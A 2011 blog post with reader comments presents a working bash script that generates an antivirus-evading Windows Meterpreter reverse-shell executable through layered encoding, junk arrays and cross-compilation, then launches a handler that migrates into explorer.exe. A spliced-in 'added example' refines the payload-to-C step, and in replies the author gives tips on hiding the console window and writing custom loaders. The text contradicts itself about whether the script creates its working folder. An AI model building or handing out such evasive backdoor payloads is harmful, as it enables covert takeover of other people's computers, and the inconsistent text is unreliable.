Bypassing Antivirus somehow…

There is not much to be said about this topic, as there are so many ways to accomplish it. I wanted to give it a shot and see how far I would get in creating something that others call FUD (Fully Undetectable). As you can see from the results below, the file still gets detected by the Microsoft and Kaspersky AV engines, but I have intentionally left the important part out of the shell script that would make it fully undetectable. I was using some simple shellscript-fu and some really basic knowledge of the C language. The resulting executable (and therefore its hash) will be different every time you run this script.

Update 11.11.2011 – As expected, VirusTotal is starting to detect this stuff ;) Just change the source code a bit (hint hint) and you get a clean executable again. May the source be with you.

What we need is a decent Linux distro, a MinGW-w64 cross compiler (mingw32) and of course Metasploit. I'm using a Debian based system in this example, so hopefully the shell script below will work as-is. As always, please study it first to see what it does – don't be a script kiddie. Please remember to save it into the Metasploit root folder (the directory that contains msfpayload, msfencode and msfcli, since the script calls them as ./msfpayload etc.) and make it executable with chmod +x.

       REVERSE_TCP Payload generator

#!/bin/bash
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "                  By Astr0baby 2011                         "
echo "  With some Randomic gravy and sauce to bypass Antivirus    "
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
# Check for the MinGW-w64 cross compiler (32-bit Windows target)
if builtin type -p i686-w64-mingw32-gcc > /dev/null ; then
    echo "Here is a network device list available on your machine"
else
    echo "Please install the mingw-w64, binutils-mingw-w64, gcc-mingw-w64, mingw-w64-dev, mingw-w64-tools"
    echo "exiting....."; exit 1
fi
# Interface names from /proc/net/dev, skipping the two header lines
cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
read enumber
# Get OS name and the IPv4 address of the chosen interface (used as LHOST)
OS=`uname`
IP="" # store IP
case $OS in
   Linux) IP=`ifconfig $interface | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
esac
#echo "$IP"
# Generate the staged reverse_tcp meterpreter and push it through several encoder passes.
# The last msfencode has no -t, so it prints the default (ruby) format that the
# sed lines below expect: a "buf = " line followed by "\x.." + lines
./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw |  ./msfencode -e x86/shikata_ga_nai -c $enumber  > test.c
# The ShellCode working folder must exist, otherwise mv renames test.c to "ShellCode" and cd fails
mkdir -p ShellCode
mv test.c ShellCode
cd ShellCode || exit 1
#Replacing plus signs at the end of line (safe: every payload byte is \x escaped)
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
# Junk array #1: $seed random numbers, shuffled, one quoted number per line
echo "#include <stdio.h>" > temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2
echo  ';' >> temp2
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
# main() jumps straight into the micro[] array in the data section
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c
mv ready2.c final.c
# Junk array #2, appended after main()
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo  ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c
#Cleanup
rm -f clean.c test.c ready.c rand.c temp2 temp3 temp4

# Cross compile to a 32-bit Windows PE, then give it a random name
i686-w64-mingw32-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe $RANDOM.exe
filex=`ls -ct1 | head -1`
# Use the cross toolchain's strip (host strip may not recognise the PE format),
# then print the checksum of the file as it will be deployed
i686-w64-mingw32-strip --strip-debug $filex
sumx=`sha1sum $filex`
echo $filex "...generated in ShellCode subfolder"
echo $filex "sha1checksum is .." $sumx
cd ..
echo "      starting the meterpreter listener..."
sleep 2
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2  explorer.exe'  E

What happens here is this:

  1. We choose a network interface from the /proc/net/dev list   $interface
  2. Next we select a port number for our meterpreter handler to listen on   $port
  3. A random seed controls how much junk data is added to the resulting C source file   $seed
  4. Finally, how many cycles we encode our shellcode with   $enumber
  5. Next we create the raw shellcode with msfpayload and run it through the msfencode chain with our variables
  6. Do some sed and format the encoded shellcode into a C array
  7. Add some random data arrays (ufs[] and tap[]) around it
  8. Compile the C source with mingw32 to get a Win32 PE executable
  9. Rename the EXE to some random filename, e.g. 32423.exe
  10. Strip the debug info from the binary

Note that main() jumps straight into micro[], which lives in the writable data section of the PE, so the call will fault on any system that enforces DEP for this process.
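The text munging of steps 5 to 7 above, rewritten as a small set of shell functions. This is an added example and not part of the original script. It assumes the `ruby` output format of msfencode/msfvenom (a `buf =` line followed by `"\x.."` lines joined with a trailing `+`); the sample payload bytes are constructed for the demo and are not real shellcode. Unlike the script it only strips a `+` at the end of a line, and it adds a round-trip check that every escaped byte in the generated C array matches the input, which is the check you want before spending a compile and a test run on a payload the conversion may have mangled.

```shell
#!/bin/sh
# Added example: msfencode "-f ruby" output -> C source with random junk arrays.
# Plain POSIX sh plus awk/sed/grep; no bash-isms such as $RANDOM.

# Constructed sample in the ruby format (NOT real shellcode, just a byte
# pattern): a "buf =" line, then quoted \x-escaped lines joined by a trailing +.
SAMPLE_RUBY='buf =
"\xfc\xe8\x89\x00\x00\x00\x60\x89" +
"\xe5\x31\xd2\x64\x8b\x52\x30\x8b" +
"\x52\x0c\x8b\x52\x14"'

# Turn ruby-format output on stdin into a C array named $1.  Only the trailing
# "+" continuation is removed; every payload byte is \x escaped, so no byte can
# be touched by the substitution.
ruby_buf_to_c_array() {
    sed -e "s/^buf[[:space:]]*=[[:space:]]*$/unsigned char $1[] =/" \
        -e 's/"[[:space:]]*+[[:space:]]*$/"/'
    printf ';\n'
}

# Emit $2 random decimal strings as a C array named $1: the "random gravy" that
# makes every compiled file (and its hash) differ.  awk's rand() replaces the
# bash-only $RANDOM loop used by the script.
junk_array() {
    printf 'unsigned char %s[] =\n' "$1"
    awk -v n="$2" 'BEGIN { srand(); for (i = 0; i < n; i++) printf "\"%d\"\n", int(rand() * 32768) }'
    printf ';\n'
}

# Assemble the complete translation unit in the same layout the script uses:
# include, junk array, payload array, main() that jumps into the payload, junk
# array.  $1 = payload array name, $2 = entries per junk array; payload on stdin.
emit_c_source() {
    printf '#include <stdio.h>\n'
    junk_array ufs "$2"
    ruby_buf_to_c_array "$1"
    printf 'int main(void) { ((void (*)())%s)(); return 0; }\n' "$1"
    junk_array tap "$2"
}

# Collect every \xNN escape on stdin as one lowercase hex string.  The junk
# arrays hold plain decimal strings, so only payload bytes match.
escaped_bytes_hex() {
    grep -o '\\x[0-9a-fA-F][0-9a-fA-F]' | sed 's/^\\x//' | tr 'A-F' 'a-f' | tr -d '\n'
}

# Round-trip check: the bytes in the generated source must equal the bytes in
# the ruby-format input.  Returns 0 on success, 1 if anything was lost or added.
verify_roundtrip() {
    want=$(printf '%s\n' "$SAMPLE_RUBY" | escaped_bytes_hex)
    got=$(printf '%s\n' "$SAMPLE_RUBY" | emit_c_source micro 16 | escaped_bytes_hex)
    [ -n "$want" ] && [ "$want" = "$got" ]
}

# Stand-alone run: print the generated C source, then report the check result.
printf '%s\n' "$SAMPLE_RUBY" | emit_c_source micro 8
if verify_roundtrip; then
    echo "payload bytes intact" >&2
else
    echo "payload bytes changed by the conversion" >&2
fi
```

The generated source compiles with the same i686-w64-mingw32-gcc call the script uses. main() still jumps into the data section exactly as in the original, so nothing about the DEP caveat changes here; to use it on a real payload, pipe the msfencode output (or `msfvenom -f ruby`) into emit_c_source instead of the constructed sample.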

Here are some screenshots from Antivirus scanner engines I’ve taken to see how well the resulting executable avoids individual AVs.

The most obvious step for creating a fully undetectable Meterpreter payload executable is intentionally left out of the script.


41 Responses to Bypassing Antivirus somehow…

  1. Pingback: Coresec.org – Information Security Blog » FUD Payload Generator for Backtrack

  2. Pingback: FUD Payload Generator for Backtrack 5 « AfterShell.com – IT Security Blog

  3. Pingback: So you have antivirus and you think you are protected.. pfft….. think again… « Daniel Weis's I.T Security Blog

  4. hidden says:

    I understood your hint about the bit, but how do I apply your hint? :-?

  5. Janus says:

    Hi Astr0baby,

    Nice work. I’m thoroughly enjoying learning from your awesome tutorial.
    I finally got a FUD meterpreter compiled and it connects back fine from my test machine (win 7 EN), but when I try to migrate the process dies and I lose the session. Also noticed that a DOS box pops up and has to be manually closed which isn’t very stealthy. Likely that I broke something messing around with your code. I used the i686-w64-mingw32-gcc compiler instead. Didn’t get any errors although meterpreter seems buggy now. I just tried compiling another one and it dies while receiving the stage from the listener I have set up on the internet. I imagine I’m breaking something with your script but I’m not sure what. I think it’s interesting that both FUD samples used the same exact script yet one seems more broken than the other.
    Any ideas or hints?

    Thanks,
    Janus

    • astr0baby says:

      Hi Janus,

      if you want a stealthy execution of the payload you need to change the Generator C code a little.
      In C++ there are functions to make the command line window invisible using various methods. For example you can use the WinAPI ShowWindow( hwnd, SW_HIDE ); as one method, but then you need to use the proper headers in the generator code. I've omitted these functions on purpose so it would not be abused in a malicious way. As for the broken executables, you can try and debug them to see what causes the crashes; I honestly cannot say (maybe it's mingw related).

  6. xenocide says:

    Could you explain the $RANDOM variable please. Thanks

    • astr0baby says:

      $RANDOM is an internal Bash function (not a constant) that returns a pseudorandom [1] integer in the range 0 – 32767. It should not be used to generate an encryption key.

  7. The Moorish says:

    is it possible to use this method to make Metasploit’s ms08_067_netapi FUD?

    • astr0baby says:

      Hi,
      I'm afraid you would have to rewrite the ms08_067_netapi module to include a "custom exe" in the advanced options. This option is available in the psexec module for example (show advanced).

  8. gr0w1 says:

    Hi astr0baby, I have tested the exe output of the script; it works properly with Windows 7 but won't run on Windows XP. I have modified your script to insert an external IP address, so nothing vital for the script... any idea???

  9. gr0w1 says:

    Hi, I have found my problem... the exe output works only with 64-bit systems. I tried with Windows XP and Windows 7 32-bit and it won't run... do you have some ideas to change the script and make it work even with 32-bit?

    • astr0baby says:

      Hi, just make sure you use the right compiler (for 32-bit or 64-bit binary executables). And I would suggest checking the compiler string in the script as there might be some problems. Good luck ;)

  10. ChunKill says:

    Is there any way to get the EXE file into a WinRAR SFX and encrypt it so that people cannot extract the file? Is it also as undetectable as it gets?
    Example: Themida (obsolete). I await tips – Thanks

    • astr0baby says:

      There are many ways to get a binary undetectable by modern AVs. This example was just a little exercise for making the Meterpreter executables undetectable when run for example via psexec module. A good start is probably learning how to do simple things in C++ and then write your own source code and insert your shellcode into it. Many advanced AVs flag packed executables as dangerous anyways. In my opinion the best way is to make a legitimate C++ loader with some bogus functions, hide the shellcode in some clever way and compile the result.

  11. alex says:

    Can anyone please tell me how to make it executable???

  12. alex says:

    Can anyone please tell me how to make it executable?... I copied the code and saved it as vanish.sh, but when I run it, it says permission denied... why?

  13. alex says:

    Thank you master. Does this work on Win7?

  14. alex says:

    Please help;
    I have a little bit of trouble running vanish.sh.
    I already made it an executable file, but it says...

    ************************************************************
    Automatic shellcode generator – FOR METASPLOIT
    By Astr0baby 2011
    With some Randomic gravy and sauce to bypass Antivirus
    For Automatic Teensy programming and deployment
    ************************************************************
    Please install the mingw-w64, binutils-mingw-w64, gcc-mingw-w64, mingw-w64-dev, mingw-w64-tools
    exiting…..

    I'm using BT5R3.
    I tried to download mingw-w64, binutils-mingw-w64, gcc-mingw-w64, mingw-w64-dev, mingw-w64-tools, using this command:

    sudo apt-get install Mingw-w64-tools
    it says:
    Reading package lists… Done
    Building dependency tree
    Reading state information… Done
    E: Couldn’t find package Mingw-w64-tools

    Am I using the correct command?????? ... I'm confused... :((

    Could anyone please tell me how to download any of these???

  15. alex says:

    thank you,…:))))

  16. alex says:

    When checking whether the file works, this wine error comes up:

    fixme:toolhelp:CreateToolhelp32Snapshot Unimplemented: heap list snapshot
    fixme:toolhelp:Heap32ListFirst : stub
    wine: Unhandled page fault on read access to 0x00000000 at address 0x9830cc (thread 002f), starting debugger…

  17. alex says:

    Thank you very much, you helped me a lot... appreciate it :)) !! It works...

  18. alex says:

    Thanks for the help... it works, but only inside my network. I have my netbook and laptop connected to different networks. Then I started my vanish.sh, started listening, transferred the file that vanish.sh generated onto the Windows machine, but no sessions...
    I already set up the port forwarding in my router for 443 & 80 ("followed your tutorial") and visited http://www.portforward.com...

    Any suggestion to make it work over another network?

  19. alex says:

    OK, thanks a lot ;)

  20. alex says:

    One more:
    when executing vanish.sh, what IP will it set for the payload? The external IP?
    If not, how do I set it?

  21. alex says:

    For port forwarding I'm using a Linksys E1200. I also forwarded port 4444 in my router and opened the port using this command:
    iptables -A INPUT -p tcp -s 192.168.1.0/24 --dport 4444 -j ACCEPT

  22. back1door@ymail.com says:

    Help me... why is vanish.sh not working?????
    # cd /pentest/exploits/framework2
    root@bt:/pentest/exploits/framework2# ./vanish.sh
    ************************************************************
    Fully Undetectable Metasploit Payload generaor Beta
    Original Concept and Script by Astr0baby
    Stable Version of Script is Edited by Vanish3r
    Video Tutorial by Vanish3r – http://www.securitylabs.in
    Powered by TheHackerNews.com and securitylabs.in
    ************************************************************
    Network Device On your Computer :
    lo:
    wlan0:
    eth0:
    Which Interface to use ? eth0
    What Port Number are we gonna listen to? : 4444
    Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 6000
    How many times you want to encode ? 1-20 : 5
    Current Ip is : 192.168.1.75
    Unknown option: c
    Unknown option: c
    Unknown option: c
    Unknown option: c
    [*] Invalid encoder specified
    [*] Invalid encoder specified
    [*] Invalid encoder specified
    [*] Invalid encoder specified

    Usage: ./msfpayload [var=val]

  23. Blake says:

    My brother recommended I might like this web site.
    He was totally right. This post truly made my day. You can not imagine just how much time I had spent for this information!
    Thanks!

  24. levi says:

    Hi astr0baby. Thanks for this code... but I tried to run it (saved it as fud.sh, chmod +x it) and it's still giving me this

    Please install the mingw-w64, binutils-mingw-w64, gcc-mingw-w64, mingw-w64-dev, mingw-w64-tools
    exiting…..

    I’ve already done this to install mingw
    apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

    Have I missed something? :)
    Please help :)

    thanks
    levi

    • astr0baby says:

      Hi,
      just delete the following code from the script:
      #Lets check for MinGW32
      if builtin type -p i686-w64-mingw32-gcc > /dev/null ; then

      echo "Here is a network device list available on your machine"
      else echo "Please install the mingw-w64, binutils-mingw-w64, gcc-mingw-w64, mingw-w64-dev, mingw-w64-tools"
      echo "exiting....."; exit
      fi

      • levi says:

        Thanks for the reply astr0, but there's another problem... I really want to try this, so... here is what's wrong

        ./fud2.sh: line 28: cd: ShellCode: Not a directory
        sed: can’t read test.c: No such file or directory

        I tried cd Shellcode myself and got the same error. Is it the Metasploit install which is causing this?

        By the way my .sh is inside /opt/metasploit/msf3

        thanks again

      • astr0baby says:

        You need to create a ShellCode directory in the root folder where your metasploit installation is, in your case it is in /opt/metasploit/msf3
        so create a subfolder with mkdir /opt/metasploit/msf3/ShellCode; the script does not create it automatically, so you need to create it yourself. Good luck.
